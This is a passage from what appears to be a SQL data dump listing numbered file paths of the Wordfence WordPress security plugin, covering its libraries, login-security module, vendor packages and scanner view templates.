e/lib/dashboard/widget_networkattacks.php'),(1182,'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php'),(1183,'wp-content/plugins/wordfence/lib/diffResult.php'),(1184,'wp-content/plugins/wordfence/lib/email_genericAlert.php'),(1185,'wp-content/plugins/wordfence/lib/email_newIssues.php'),(1186,'wp-content/plugins/wordfence/lib/email_unlockRequest.php'),(1187,'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),(1188,'wp-content/plugins/wordfence/lib/flags.php'),(1189,'wp-content/plugins/wordfence/lib/live_activity.php'),(1190,'wp-content/plugins/wordfence/lib/menu_dashboard.php'),(1191,'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),(1192,'wp-content/plugins/wordfence/lib/menu_firewall.php'),(1193,'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),(1194,'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),(1195,'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),(1196,'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),(1197,'wp-content/plugins/wordfence/lib/menu_options.php'),(1198,'wp-content/plugins/wordfence/lib/menu_scanner.php'),(1199,'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),(1200,'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),(1201,'wp-content/plugins/wordfence/lib/menu_support.php'),(1202,'wp-content/plugins/wordfence/lib/menu_tools.php'),(1203,'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),(1204,'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),(1205,'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),(1206,'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),(1207,'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),(1208,'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),(1209,'wp-content/plugins/wordfence/lib/noc1.key'),(1210,'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),(1211,'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),(1212,'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),(1213,'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),(1214,'wp-content/plugins/wordfence/lib/sysinfo.php'),(1215,'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),(1216,'wp-content/plugins/wordfence/lib/wf503.php'),(1217,'wp-content/plugins/wordfence/lib/wfAPI.php'),(1218,'wp-content/plugins/wordfence/lib/wfActivityReport.php'),(1219,'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php'),(1220,'wp-content/plugins/wordfence/lib/wfAlerts.php'),(1221,'wp-content/plugins/wordfence/lib/wfArray.php'),(1222,'wp-content/plugins/wordfence/lib/wfBrowscap.php'),(1223,'wp-content/plugins/wordfence/lib/wfBrowscapCache.php'),(1224,'wp-content/plugins/wordfence/lib/wfBulkCountries.php'),(1225,'wp-content/plugins/wordfence/lib/wfCache.php'),(1226,'wp-content/plugins/wordfence/lib/wfCentralAPI.php'),(1227,'wp-content/plugins/wordfence/lib/wfConfig.php'),(1228,'wp-content/plugins/wordfence/lib/wfCrawl.php'),(1229,'wp-content/plugins/wordfence/lib/wfCredentialsController.php'),(1230,'wp-content/plugins/wordfence/lib/wfCrypt.php'),(1231,'wp-content/plugins/wordfence/lib/wfDB.php'),(1232,'wp-content/plugins/wordfence/lib/wfDashboard.php'),(1233,'wp-content/plugins/wordfence/lib/wfDateLocalization.php'),(1234,'wp-content/plugins/wordfence/lib/wfDiagnostic.php'),(1235,'wp-content/plugins/wordfence/lib/wfDict.php'),(1236,'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php'),(1237,'wp-content/plugins/wordfence/lib/wfHelperBin.php'),(1238,'wp-content/plugins/wordfence/lib/wfHelperString.php'),(1239,'wp-content/plugins/wordfence/lib/wfIPWhitelist.php'),(1240,'wp-content/plugins/wordfence/lib/wfImportExportController.php'),(1241,'wp-content/plugins/wordfence/lib/wfIssues.php'),(1242,'wp-content/plugins/wordfence/lib/wfJWT.php'),(1243,'wp-content/plugins/wordfence/lib/wfLicense.php'),(1244,'wp-content/plugins/wordfence/lib/wfLockedOut.php'),(1245,'wp-content/plugins/wordfence/lib/wfLog.php'),(1246,'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php'),(1247,'wp-content/plugins/wordfence/lib/wfModuleController.php'),(1248,'wp-content/plugins/wordfence/lib/wfNotification.php'),(1249,'wp-content/plugins/wordfence/lib/wfOnboardingController.php'),(1250,'wp-content/plugins/wordfence/lib/wfPersistenceController.php'),(1251,'wp-content/plugins/wordfence/lib/wfRESTAPI.php'),(1252,'wp-content/plugins/wordfence/lib/wfScan.php'),(1253,'wp-content/plugins/wordfence/lib/wfScanEngine.php'),(1254,'wp-content/plugins/wordfence/lib/wfSchema.php'),(1255,'wp-content/plugins/wordfence/lib/wfStyle.php'),(1256,'wp-content/plugins/wordfence/lib/wfSupportController.php'),(1257,'wp-content/plugins/wordfence/lib/wfUnlockMsg.php'),(1258,'wp-content/plugins/wordfence/lib/wfUpdateCheck.php'),(1259,'wp-content/plugins/wordfence/lib/wfUtils.php'),(1260,'wp-content/plugins/wordfence/lib/wfVersionCheckController.php'),(1261,'wp-content/plugins/wordfence/lib/wfView.php'),(1262,'wp-content/plugins/wordfence/lib/wfViewResult.php'),(1263,'wp-content/plugins/wordfence/lib/wordfenceClass.php'),(1264,'wp-content/plugins/wordfence/lib/wordfenceConstants.php'),(1265,'wp-content/plugins/wordfence/lib/wordfenceHash.php'),(1266,'wp-content/plugins/wordfence/lib/wordfenceScanner.php'),(1267,'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php'),(1268,'wp-content/plugins/wordfence/license.txt'),(1269,'wp-content/plugins/wordfence/models/.htaccess'),(1270,'wp-content/plugins/wordfence/models/block/wfBlock.php'),(1271,'wp-content/plugins/wordfence/models/block/wfRateLimit.php'),(1272,'wp-content/plugins/wordfence/models/common/wfGeoIP2.php'),(1273,'wp-content/plugins/wordfence/models/common/wfTab.php'),(1274,'wp-content/plugins/wordfence/models/firewall/wfFirewall.php'),(1275,'wp-content/plugins/wordfence/models/page/wfPage.php'),(1276,'wp-content/plugins/wordfence/models/scanner/wfScanner.php'),(1277,'wp-content/plugins/wordfence/modules/login-security/classes/.htaccess'),(1278,'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php'),(1279,'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php'),(1280,'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php'),(1281,'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php'),(1282,'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php'),(1283,'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php'),(1284,'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php'),(1285,'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php'),(1286,'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php'),(1287,'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php'),(1288,'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php'),(1289,'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php'),(1290,'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php'),(1291,'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php'),(1292,'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php'),(1293,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php'),(1294,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php'),(1295,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php'),(1296,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php'),(1297,'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php'),(1298,'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php'),(1299,'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php'),(1300,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php'),(1301,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php'),(1302,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php'),(1303,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php'),(1304,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php'),(1305,'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php'),(1306,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php'),(1307,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php'),(1308,'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php'),(1309,'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1647958122.css'),(1310,'wp-content/plugins/wordfence/modules/login-security/css/admin.1647958122.css'),(1311,'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1647958122.css'),(1312,'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1647958122.css'),(1313,'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1647958122.css'),(1314,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1647958122.css'),(1315,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1647958122.css'),(1316,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1647958122.css'),(1317,'wp-content/plugins/wordfence/modules/login-security/css/login.1647958122.css'),(1318,'wp-content/plugins/wordfence/modules/login-security/img/header.svg'),(1319,'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),(1320,'wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),(1321,'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),(1322,'wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),(1323,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),(1324,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),(1325,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),(1326,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),(1327,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(1328,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(1329,'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1647958122.js'),(1330,'wp-content/plugins/wordfence/modules/login-security/js/admin.1647958122.js'),(1331,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1647958122.js'),(1332,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1647958122.js'),(1333,'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1647958122.js'),(1334,'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1647958122.js'),(1335,'wp-content/plugins/wordfence/modules/login-security/js/login.1647958122.js'),(1336,'wp-content/plugins/wordfence/modules/login-security/views/.htaccess'),(1337,'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(1338,'wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php'),(1339,'wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php'),(1340,'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(1341,'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(1342,'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(1343,'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(1344,'wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php'),(1345,'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(1346,'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(1347,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(1348,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(1349,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(1350,'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(1351,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php'),(1352,'wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php'),(1353,'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(1354,'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(1355,'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(1356,'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(1357,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(1358,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(1359,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(1360,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(1361,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(1362,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(1363,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(1364,'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(1365,'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(1366,'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(1367,'wp-content/plugins/wordfence/modules/login-security/views/page/role.php'),(1368,'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(1369,'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(1370,'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(1371,'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(1372,'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(1373,'wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php'),(1374,'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(1375,'wp-content/plugins/wordfence/readme.txt'),(1376,'wp-content/plugins/wordfence/tmp/.htaccess'),(1377,'wp-content/plugins/wordfence/vendor/.htaccess'),(1378,'wp-content/plugins/wordfence/vendor/autoload.php'),(1379,'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(1380,'wp-content/plugins/wordfence/vendor/composer/LICENSE'),(1381,'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(1382,'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(1383,'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(1384,'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(1385,'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(1386,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE'),(1387,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem'),(1388,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php'),(1389,'wp-content/plugins/wordfence/vendor/composer/installed.json'),(1390,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules'),(1391,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs'),(1392,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE'),(1393,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php'),(1394,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php'),(1395,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php'),(1396,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php'),(1397,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php'),(1398,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php'),(1399,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php'),(1400,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php'),(1401,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php'),(1402,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php'),(1403,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php'),(1404,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php'),(1405,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php'),(1406,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php'),(1407,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php'),(1408,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php'),(1409,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php'),(1410,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php'),(1411,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php'),(1412,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php'),(1413,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php'),(1414,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php'),(1415,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php'),(1416,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php'),(1417,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php'),(1418,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php'),(1419,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php'),(1420,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php'),(1421,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php'),(1422,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php'),(1423,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE'),(1424,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php'),(1425,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php'),(1426,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php'),(1427,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php'),(1428,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php'),(1429,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php'),(1430,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php'),(1431,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php'),(1432,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php'),(1433,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php'),(1434,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php'),(1435,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php'),(1436,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE'),(1437,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php'),(1438,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php'),(1439,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php'),(1440,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php'),(1441,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php'),(1442,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php'),(1443,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),(1444,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),(1445,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),(1446,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),(1447,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),(1448,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php'),(1449,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),(1450,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),(1451,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),(1452,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),(1453,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),(1454,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),(1455,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),(1456,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),(1457,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),(1458,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),(1459,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),(1460,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),(1461,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),(1462,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),(1463,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),(1464,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),(1465,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),(1466,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),(1467,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),(1468,'wp-content/plugins/wordfence/views/.htaccess'),(1469,'wp-content/plugins/wordfence/views/blocking/block-list.php'),(1470,'wp-content/plugins/wordfence/views/blocking/blocking-create.php'),(1471,'wp-content/plugins/wordfence/views/blocking/blocking-status.php'),(1472,'wp-content/plugins/wordfence/views/blocking/country-block-map.php'),(1473,'wp-content/plugins/wordfence/views/blocking/country-modal.php'),(1474,'wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),(1475,'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),(1476,'wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),(1477,'wp-content/plugins/wordfence/views/common/block-navigation-option.php'),(1478,'wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),(1479,'wp-content/plugins/wordfence/views/common/license.php'),(1480,'wp-content/plugins/wordfence/views/common/modal-prompt.php'),(1481,'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),(1482,'wp-content/plugins/wordfence/views/common/page-help.php'),(1483,'wp-content/plugins/wordfence/views/common/page-tabbar.php'),(1484,'wp-content/plugins/wordfence/views/common/page-title.php'),(1485,'wp-content/plugins/wordfence/views/common/section-subtitle.php'),(1486,'wp-content/plugins/wordfence/views/common/section-title.php'),(1487,'wp-content/plugins/wordfence/views/common/status-circular.php'),(1488,'wp-content/plugins/wordfence/views/common/status-critical.php'),(1489,'wp-content/plugins/wordfence/views/common/status-detail.php'),(1490,'wp-content/plugins/wordfence/views/common/status-tooltip.php'),(1491,'wp-content/plugins/wordfence/views/common/status-warning.php'),(1492,'wp-content/plugins/wordfence/views/common/unsubscribe.php'),(1493,'wp-content/plugins/wordfence/views/dashboard/global-status.php'),(1494,'wp-content/plugins/wordfence/views/dashboard/option-howgetips.php'),(1495,'wp-content/plugins/wordfence/views/dashboard/options-group-alert.php'),(1496,'wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php'),(1497,'wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php'),(1498,'wp-content/plugins/wordfence/views/dashboard/options-group-general.php'),(1499,'wp-content/plugins/wordfence/views/dashboard/options-group-import.php'),(1500,'wp-content/plugins/wordfence/views/dashboard/options-group-license.php'),(1501,'wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php'),(1502,'wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php'),(1503,'wp-content/plugins/wordfence/views/dashboard/status-renewing.php'),(1504,'wp-content/plugins/wordfence/views/diagnostics/text.php'),(1505,'wp-content/plugins/wordfence/views/gdpr/banner.php'),(1506,'wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php'),(1507,'wp-content/plugins/wordfence/views/onboarding/banner.php'),(1508,'wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php'),(1509,'wp-content/plugins/wordfence/views/onboarding/fresh-install.php'),(1510,'wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php'),(1511,'wp-content/plugins/wordfence/views/onboarding/overlay.php'),(1512,'wp-content/plugins/wordfence/views/onboarding/plugin-header.php'),(1513,'wp-content/plugins/wordfence/views/onboarding/tour-overlay.php'),(1514,'wp-content/plugins/wordfence/views/options/block-all-options-controls.php'),(1515,'wp-content/plugins/wordfence/views/options/block-controls.php'),(1516,'wp-content/plugins/wordfence/views/options/option-label.php'),(1517,'wp-content/plugins/wordfence/views/options/option-select.php'),(1518,'wp-content/plugins/wordfence/views/options/option-switch.php'),(1519,'wp-content/plugins/wordfence/views/options/option-text.php'),(1520,'wp-content/plugins/wordfence/views/options/option-textarea.php'),(1521,'wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php'),(1522,'wp-content/plugins/wordfence/views/options/option-toggled-multiple.php'),(1523,'wp-content/plugins/wordfence/views/options/option-toggled-segmented.php'),(1524,'wp-content/plugins/wordfence/views/options/option-toggled-select.php'),(1525,'wp-content/plugins/wordfence/views/options/option-toggled-sub.php'),(1526,'wp-content/plugins/wordfence/views/options/option-toggled-textarea.php'),(1527,'wp-content/plugins/wordfence/views/options/option-toggled.php'),(1528,'wp-content/plugins/wordfence/views/options/option-token.php'),(1529,'wp-content/plugins/wordfence/views/options/options-title.php'),(1530,'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php'),(1531,'wp-content/plugins/wordfence/views/reports/activity-report.php'),(1532,'wp-content/plugins/wordfence/views/scanner/issue-base.php'),(1533,'wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php'),(1534,'wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php'),(1535,'wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php'),(1536,'wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php'),(1537,'wp-content/plugins/wordfence/views/scanner/issue-configReadable.php'),(1538,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php'),(1539,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php'),(1540,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php'),(1541,'wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php'),(1542,'wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php'),(1543,'wp-content/plugins/wordfence/views/scanner/issue-control-repair.php'),(1544,'wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php'),(1545,'wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php'),(1546,'wp-content/plugins/wordfence/views/scanner/issue-database.php'),(1547,'wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php'),(1548,'wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php'),(1549,'wp-content/plugins/wordfence/views/scanner/issue-file.php'),(1550,'wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php'),(1551,'wp-content/plugins/wordfence/views/scanner/issue-knownfile.php'),(1552,'wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php'),(1553,'wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php'),(1554,'wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php'),(1555,'wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php'),(1556,'wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php'),(1557,'wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php'),(1558,'wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php'),(1559,'wp-content/plugins/wordfence/views/scanner/issue-timelimit.php'),(1560,'wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php'),(1561,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php'),(1562,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php'),(1563,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php'),(1564,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php'),(1565,'wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php'),(1566,'wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php'),(1567,'wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php'),(1568,'wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php'),(1569,'wp-content/plugins/wordfence/views/scanner/no-issues.php'),(1570,'wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php'),(1571,'wp-content/plugins/wordfence/views/scanner/options-group-advanced.php'),(1572,'wp-content/plugins/wordfence/views/scanner/options-group-basic.php')